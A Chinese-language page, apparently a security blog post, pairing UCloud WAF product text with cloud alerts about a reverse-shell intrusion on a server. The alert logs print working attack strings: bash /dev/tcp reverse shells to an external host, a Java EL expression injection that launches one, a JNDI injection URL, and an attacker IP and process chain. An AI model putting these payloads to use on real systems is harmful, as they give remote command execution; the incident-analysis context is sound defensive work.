其他

2024年3月4日 星期一

2024年3月4日 星期一

事件类型,事件详情,时效,通知对象,通知方式,是否开启
主机入侵检测-安全周报 一周发送一次统计数据，用于报告主机安全情况 一周一次 默认组
主机入侵检测-暴力破解成功 用于接收暴力破解成功的告警情况 实时 默认组
主机入侵检测-木马检测 云主机被入侵后，黑客留下的后门或者恶意程序 实时 默认组
uhids主机入侵检测-异地登录 用于接收异地登录的告警情况 实时 默认组

UHIDS日志审计告警 用于UHIDS日志审计中规则匹配到日志后的告警

短信通知邮件通知

Web应用攻击防护
全面防护各类web攻击类型，如SQL注入、XSS跨站、WebShell上传、命令注入、非法HTTP协议请求、常见Web服务器漏洞攻击、核心文件非授权访问、路径穿越等，以及提供后门隔离保护及扫描防护等功能。

精准访问控制规则
支持IP、URL、Referer、User-Agent等HTTP常见字段的条件组合，打造强大的精准访问控制策略，同时支持防盗链、网站后台保护等防护场景。与Web应用攻击防护、CC防护等安全模块采用联动机制，打造多层综合保护机制，可根据需求识别可信与恶意流量。

恶意CC攻击防护
对单一源IP的访问频率进行控制，支持重定向跳转验证、人机识别等，以及针对海量慢速请求攻击，可通过统计响应码及URL请求分布、异常Referer及User-Agent特征识别，结合网站精准访问控制进行综合防护。

告警管理
灵活的告警机制，可定时发送UWAF相关域名的告警信息，以及可实时发送UWAF相关域名短时间内触发大量规则的告警、源站不正常响应的告警、请求响应异常的告警（如整体请求，499以上状态码比例大于30%）等告警信息发送至用户邮箱，提醒发生的风险。

产品介绍
WEB应用防火墙 UWAF
UWAF是对客户请求与Web应用之间信息的唯一出入口，能根据企业不同的策略控制（允许、拒绝、监测）出入网络的信息流，且本身具有较强的抗攻击能力。在逻辑上，UWAF是一个分离器，一个限制器，也是一个分析器，有效地监控了应用业务和互联网之间的任何活动，保证了内部系统的安全。

产品价值

安全防护
WAF的虚拟补丁可快速对漏洞进行实时的防护与响应

源站保护
隐藏真实源站，实现网站隐身，避免真实地址暴露受到黑客攻击

访问来源控制
通过安全准入控制，只允许云WAF的IP访问，其余定向访问一律禁止，可对抗指定源站IP进行的定向攻击行为

产品优势
低延迟
基于BGP线路接入，质量稳定，毫秒级响应延迟

规则自完善系统
基于机器学习，智能检测引擎具有优秀的泛化能力以及自动学习能力，能够同规则系统进行有机结合，为客户网站的安全提供更坚实的保障

自动化弹性扩展能力
具备自动化弹性扩展能力，利用UCloud公有云资源池作为支撑，在遭遇CC攻击或者业务突发时，能够进行自身服务的快速扩展，所以不会存在性能瓶颈问题

协同防御能力
强大的云端情报收集能力，同时结合其他情报厂商的情报，在UWAF上利用情报库可以过滤海量的恶意访问

丰富的规则支持
基于流量内容深度解析，可针对不同的业务字段进行定制化的规则设置，包括对字段内容的二次分析，比如归属地查询、自动拦截恶意IP、CC策略、自定义拦截页面等

724小时专家服务
UWAF用户，均能够享受到724小时免费的专家服务，对于复杂的攻击，当机器或者算法无法进行精准的判断和阻挡时，安全专家可以介入分析，并提供针对性的防御措施

产品规格
企业版
满足客户日常使用需求
支持多项额外能力扩展
符合等保要求
4680 元购买
旗舰版
满足客户日常使用需求
多地冗余配置
多项额外能力扩展
符合等保要求
11700 元购买
专属定制版
满足各类标准及定制化需求
云内与云外用户均可适用
多地冗余配置
多项额外能力扩展
29000 元购买
产品功能
Web应用攻击防护
全面防护各类web攻击类型，如SQL注入、XSS跨站、WebShell上传、命令注入、非法HTTP协议请求、常见Web服务器漏洞攻击、核心文件非授权访问、路径穿越等，以及提供后门隔离保护及扫描防护等功能。

精准访问控制规则
支持IP、URL、Referer、User-Agent等HTTP常见字段的条件组合，打造强大的精准访问控制策略，同时支持防盗链、网站后台保护等防护场景。与Web应用攻击防护、CC防护等安全模块采用联动机制，打造多层综合保护机制，可根据需求识别可信与恶意流量。

恶意CC攻击防护
对单一源IP的访问频率进行控制，支持重定向跳转验证、人机识别等，以及针对海量慢速请求攻击，可通过统计响应码及URL请求分布、异常Referer及User-Agent特征识别，结合网站精准访问控制进行综合防护。

告警管理
灵活的告警机制，可定时发送UWAF相关域名的告警信息，以及可实时发送UWAF相关域名短时间内触发大量规则的告警、源站不正常响应的告警、请求响应异常的告警（如整体请求，499以上状态码比例大于30%）等告警信息发送至用户邮箱，提醒发生的风险。

应用场景

安全事件&攻击
智能化检测防御恶意扫描、CC、0day攻击、信息安全内容等攻击威胁

访问控制
可实现对业务访问请求的行为管控，对访问来源通过二次数据分析保障来源访问的真实性

流量监控
实时监控业务运行安全动态，可以第一时间发现安全异常事件

等保合规
满足等保合规的各项安全性能要求指标，满足各项不同场景的分析需求，为用户助力、满足各项等级保护的合规要求

问题与处理
客户面临的问题 UWAF的有效解决方案
网页防篡改 支持静态首页等资源的网页防篡改需求
网络CC攻击 CC规则可通过阈值控制、验证码等多种方式进行安全防范
网站来源访问管理 定制化的黑白名单及路径控制，有效解决用户访问管理
等保合规要求 满足等保合规，具有销售认证许可
基本的网站防护（扫描，OWASP TOP 10等） 默认系统功能可解决来自于互联网恶意扫描等问题

2024-03-01

检测到您服务器上出现了反弹Shell事件, 可能与入侵事件相关.
攻击者通过各种方式, 使Shell可以接受攻击者发送的命令并执行, 以达到远程控制的目的.

处置建议
请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为.

告警原因
该进程的命令交互通过父进程代理的方式传输到外部服务器。
ATT&CK 矩阵ID
T1159.004
进程名称
bash
命令行
-i
进程路径
/usr/bin/bash
进程ID
4427
进程启动时间
2024-03-01 03:34:29
目的IP
91.245.253.85
目的端口
26996
父进程命令行
/usr/bin/deamondns
父进程文件路径
/usr/bin/deamondns
父进程ID
4409

反弹shell流量 紧急

发生时间：
IP：
告警描述：检测模型发现您的服务器流量中存在恶意的反弹shell流量，攻击者通过该方式与自己的服务器建立了反向网络连接，通过该连接可以执行任意命令，请根据告警详情信息做进一步判断处理。

异常事件详情
提示：云安全中心检测到您的服务器中存在恶意的反弹shell流量，请结合告警中的流量和主机的上下文内容进行相关处理。

告警原因：模型检测到主机流量中存在可疑的反弹shell流量，且主机存在相关的网络连接行为。

远程地址：91.245.253.85:26996

资产地址：

资产类型：ECS

包方向：out

网络流量内容：]0;root@iZbp1737zi9it2bjz7dys1Z:~[?1034h[root@iZbp1737zi9it2bjz7dys1Z ~]#

用户名：root

进程路径：/usr/bin/deamondns

进程ID：4409

进程外联地址：91.245.253.85:26996

命令行：/usr/bin/deamondns

进程链：

-[31810] /usr/sbin/sshd -D
-[3789] /usr/sbin/sshd -D -R
-[3801] -bash
-[4263] ./ring3bdinst.sh wget 26996
-[4398] service deamondns start
-[4407] /etc/init.d/deamondns start
-[4408] /usr/bin/deamondns
-[4409] /usr/bin/deamondns

===================================================

命令执行
{“cmd”:”/bin/bash -c exec 5<>/dev/tcp/www.cdnserver.top/22235;cat <&5 | while read line; do $line 2>&5 >&5; done “}
{“cmd”:”/bin/bash -c exec 5<>/dev/tcp/www.baidu.com/22235;cat <&5 | while read line; do $line 2>&5 >&5; done “}

表达式注入
{“checkType”:”el:normalCheck”,”expression”:”${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder[‘(java.lang.String[])’]([‘/bin/bash’,’-c’,’exec 5<>/dev/tcp/www.cdnserver.top/22235;cat <&5 | while read line; do $line 2>&5 >&5; done’]).start()")}”}

JDDI注入
{“jndi_address”:”rmi://www.cdnserver.top:22699/Object"}

ATT&CK攻击阶段
远程控制
恶意行为
awk反弹shell拦截
规则类型
进程启动
规则引擎
精准攻击识别引擎
处置动作
阻断行为
进程路径
/usr/bin/bash
命令行
/bin/bash -c exec 5<>/dev/tcp/www.cdnserver.top/22235;cat <&5 | while read line; do $line 2>&5 >&5; done
父进程路径
/usr/local/java/jdk1.8.0_181/bin/java
父进程命令行
/usr/local/java/jdk1.8.0_181/bin/java -ms512m -mx512m -Xmn128m -Djava.awt.headless=true -XX:MaxPermSize=64m -classpath /home/xxpay/service/xxpay-merchant-1.0.0/classes:
进程id
32391
父进程id
19888
父进程关系
-[1] /usr/lib/systemd/systemd –switched-root –system –deserialize 22
-[19888] /usr/local/java/jdk1.8.0_181/bin/java -ms512m -mx512m -Xmn128m -Djava.awt.headless=true -XX:MaxPermSize=64m -classpath /home/xxpay/service/xxpay-merchant-1.0.0/classes: